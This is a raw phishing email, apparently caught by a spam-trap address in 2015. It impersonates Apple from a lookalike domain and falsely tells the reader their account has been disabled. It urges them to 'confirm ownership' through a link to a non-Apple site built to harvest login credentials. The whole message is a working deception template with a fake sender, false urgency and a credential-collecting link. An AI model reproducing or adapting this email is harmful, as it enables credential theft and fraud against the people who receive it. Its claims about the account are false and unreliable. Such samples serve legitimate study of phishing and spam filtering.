	(envelope-from <hellloserver5@ns1.hellloserver5.tk>)
	id 1YXxw7-0000TC-W3
	for bait@untroubled.org; Tue, 17 Mar 2015 20:18:00 +0000
To: bait@untroubled.org
Subject: Your account has been disabled temporarily
From: apple <noreply@applie.com>
Reply-To: 
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit
Message-Id: <E1YXxw7-0000TC-W3@ns1.hellloserver5.tk>
Date: Tue, 17 Mar 2015 20:17:59 +0000
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - ns1.hellloserver5.tk
X-AntiAbuse: Original Domain - untroubled.org
X-AntiAbuse: Originator/Caller UID/GID - [501 512] / [47 12]
X-AntiAbuse: Sender Address Domain - ns1.hellloserver5.tk
X-Get-Message-Sender-Via: ns1.hellloserver5.tk: authenticated_id: hellloserver5/only user confirmed/virtual account not confirmed
Content-Length: 7258

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<style type="text/css"><!--
body, p, td, div, li, ul, input { font-family:Arial, Helvetica, sans-serif;font-size:12px;color:#666;}
--></style>
</head>

<body>

<div style="padding:20px 20px 40px 20px;background-color:#666666;">
<table style="background-color:#ffffff;" align="center" border="0" cellpadding="0" cellspacing="0" width="560">
<tbody><tr>
<td bgcolor="#666666"><img style="display:block;" alt="Apple" src="http://upload7.ir/imgs/2014-08/15303105207258948817.jpg" border="0" height="52" width="560"></td>
</tr>
<tr>
<td colspan="2" style="padding:3px 18px 0 18px;" align="left" bgcolor="#ffffff" valign="top">
<div style="font-family:Lucida Grande, Arial, Helvetica, Geneva, Verdana, sans-serif;color:#000000;font-size:12px;line-height:1em;"></div>
</td>
</tr>
<tr>
<td style="padding:5px 18px 0 18px;" colspan="2" align="left" bgcolor="#ffffff" valign="top">
<div style="width:524px;font-family:Lucida Grande, Arial, Helvetica, Geneva, Verdana, sans-serif;color:#000000;font-size:12px;line-height:1.25em;">&nbsp;</div>
</td>
</tr>
<tr>
<td colspan="2" style="padding:0px 1px 0px 18px;" align="left" bgcolor="#ffffff" valign="top">
<div style="width:524px;font-family:Lucida Grande, Arial, Helvetica, Geneva, Verdana, sans-serif;color:#000000;font-size:12px;line-height:1.25em;"> Hello,</div>
</td>
</tr>
<tr>
<td colspan="2" style="padding:5px 18px 0 18px;" align="left" bgcolor="#ffffff" valign="top">
<div style="width:524px;font-family:Lucida Grande, Arial, Helvetica, Geneva, Verdana, sans-serif;color:#000000;font-size:12px;line-height:1.3em;">&nbsp;</div>
</td>
<tr>
<td colspan="2" style="padding:0px 1px 0px 18px;" align="left" bgcolor="#ffffff" valign="top">
<div style="width:524px;font-family:Lucida Grande, Arial, Helvetica, Geneva, Verdana, sans-serif;color:#000000;font-size:12px;line-height:1.25em;">Your account has been disabled temporarily.</div><tr></div><tr>
<td colspan="2" style="padding:0px 1px 0px 18px;" align="left" bgcolor="#ffffff" valign="top">
<div style="width:524px;font-family:Lucida Grande, Arial, Helvetica, Geneva, Verdana, sans-serif;color:#000000;font-size:12px;line-height:1.25em;">Why :</div>
</td>
</tr>
<tr>
<td colspan="2" style="padding:0px 1px 0px 18px;" align="left" bgcolor="#ffffff" valign="top">
<div style="width:524px;font-family:Lucida Grande, Arial, Helvetica, Geneva, Verdana, sans-serif;color:#000000;font-size:12px;line-height:1.25em;"</li><li>Then log into your account from another site.</div>
</td>
</tr>
<tr>
<td colspan="2" style="padding:0px 1px 0px 18px;" align="left" bgcolor="#ffffff" valign="top">
<div style="width:524px;font-family:Lucida Grande, Arial, Helvetica, Geneva, Verdana, sans-serif;color:#000000;font-size:12px;line-height:1.25em;"</li><li>For this reason we have temporarily suspend your account.</div>
</td>
</tr>
<tr>
</td>
</tr>
<td colspan="2" style="padding:10px 1px 0px 18px;" align="left" bgcolor="#ffffff" valign="top">
<div style="width:524px;font-family:Lucida Grande, Arial, Helvetica, Geneva, Verdana, sans-serif;color:#000000;font-size:12px;line-height:1.25em;"</li>You must provide us with the Apple account information to confirm ownership of your account.</div>
</td>
</tr>
<tr>
<td colspan="2" style="padding:5px 18px 0 18px;" align="left" bgcolor="#ffffff" valign="top">
<div style="width:524px;font-family:Lucida Grande, Arial, Helvetica, Geneva, Verdana, sans-serif;color:#000000;font-size:12px;line-height:1.25em;">&nbsp;</div>
</td>
</tr>
<tr>
<td colspan="2" style="padding:0px 1px 0px 18px;" align="left" bgcolor="#ffffff" valign="top">
<div style="width:524px;font-family:Lucida Grande, Arial, Helvetica, Geneva, Verdana, sans-serif;color:#000000;font-size:12px;line-height:1.25em;">
<a href="http://appidq.company/a/compte.html" style="color:#0088cc;" class="ecxaapl-link" target="_blank"> Confirmation Now &gt;</a>
</div>
</td>
</tr>
<tr>
<td colspan="2" style="padding:10px 1px 0px 18px;" align="left" bgcolor="#ffffff" valign="top">
<div style="width:524px;font-family:Lucida Grande, Arial, Helvetica, Geneva, Verdana, sans-serif;color:#000000;font-size:12px;line-height:1.25em;"></div><font style="font-size: 11px; font-family: Verdana,Arial,Helvetica,sans-serif;"><font style="font-size: 9pt;" face="Arial"><strong><span style="font-weight: 700;"></strong>
Account information must be provided Apple confirm ownership of your account.</font></font>
<br></td>
</tr>
<tr>
<td colspan="2" style="padding:0px 1px 0px 18px;" align="left" bgcolor="#ffffff" valign="top">
<div style="width:524px;font-family:Lucida Grande, Arial, Helvetica, Geneva, Verdana, sans-serif;color:#000000;font-size:12px;line-height:1.25em;">
</div><br></td></tr><tr>
<td colspan="2" style="padding:10px 1px 0px 18px;" align="left" bgcolor="#ffffff" valign="top">
<div style="width:524px;font-size:1px;line-height:1px;border-bottom:1px solid #000000;">&nbsp;</div>
</td>
</tr>
<tr>
<td colspan="2" style="padding:0px 1px 0px 18px;" align="left" bgcolor="#ffffff" valign="top">
<div style="width:524px;font-family:Lucida Grande, Arial, Helvetica, Geneva, Verdana, sans-serif;color:#000000;font-size:12px;line-height:1.25em;">
&nbsp;
</div>
</td>
</tr>
<tr>
<td colspan="2" style="padding:0px 1px 0px 18px;" align="left" bgcolor="#ffffff" valign="top">
<div style="width:524px;font-family:Lucida Grande, Arial, Helvetica, Geneva, Verdana, sans-serif;color:#000000;font-size:12px;line-height:1.25em;">
&nbsp;
</div>
</td>
</tr>
<tr>
<td colspan="2" style="padding:0px 1px 0px 18px;" align="left" bgcolor="#ffffff" valign="top">
<div style="width:524px;font-family:Lucida Grande, Arial, Helvetica, Geneva, Verdana, sans-serif;color:#000000;font-size:12px;line-height:1.25em;">
</td>
</tr>
<tr>
<td style="padding:0 18px 0 18px;" colspan="2" align="left" bgcolor="#ffffff" valign="top">
<div style="font-family:Lucida Grande, Arial, Helvetica, Geneva, Verdana, sans-serif;color:#000000;font-size:12px;line-height:1.25em;">Thanks,</div>
</td>
</tr>
<tr>
<td style="padding:0 18px 0 18px;" colspan="2" align="left" bgcolor="#ffffff" valign="top">
<div style="font-family:Lucida Grande, Arial, Helvetica, Geneva, Verdana, sans-serif;color:#000000;font-size:12px;line-height:1.25em;">Apple Customer Support</div>
</td>
</tr>
<tr>
<td><img style="display:block;" alt="" src="http://upload7.ir/imgs/2014-08/15303105207258948817.jpg" border="0" height="34" width="560"></td>
</tr>
</tbody></table>
<table align="center" border="0" cellpadding="0" cellspacing="0" width="524">
<tbody><tr>
<td style="padding-top:20px;" align="left">
<div style="font-family:Geneva, Verdana, Arial, Helvetica, sans-serif;font-size:9px;line-height:12px;color:#cccccc;">
<br>Copyright © 2014 Apple Inc. All rights reserved<br>
<a href="http://www.apple.com/legal/terms/site.html" style="color:#cccccc;white-space:nowrap;text-decoration:underline;" target="_blank">
Terms of Use</a> /
<a href="http://www.apple.com/legal/privacy/" style="color:#cccccc;white-space:nowrap;text-decoration:underline;" target="_blank">
Privacy Policy</a> /
<a href="http://www.apple.com/contact" style="color:#cccccc;white-space:nowrap;text-decoration:underline;" target="_blank">
Contact Us</a>
</div>
</td>
</tr>
</tbody></table>
